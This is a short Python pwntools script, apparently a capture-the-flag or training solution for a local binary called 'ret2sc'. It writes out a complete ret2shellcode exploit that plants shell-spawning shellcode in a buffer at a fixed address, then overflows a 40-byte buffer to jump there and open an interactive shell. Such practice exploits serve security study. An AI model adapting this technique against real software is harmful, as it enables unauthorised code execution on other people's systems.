#! /usr/bin/python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2018 howpwn <finn79426@gmail.com>
#
# Distributed under terms of the MIT license.

from pwn import *

p = process("./ret2sc")
context.arch = "amd64"

padding = 40

shellcode = asm(shellcraft.sh())

name_addr = 0x601080 # 可用 gdb 下斷點一步一步去 trace，會發現 0x601080 在 call read() 的時候在 arg[1]
p.recvuntil(":")
p.sendline(shellcode)


payload = "A"*40
payload += flat([name_addr])

p.recvuntil(":")
p.sendline(payload)

p.interactive()


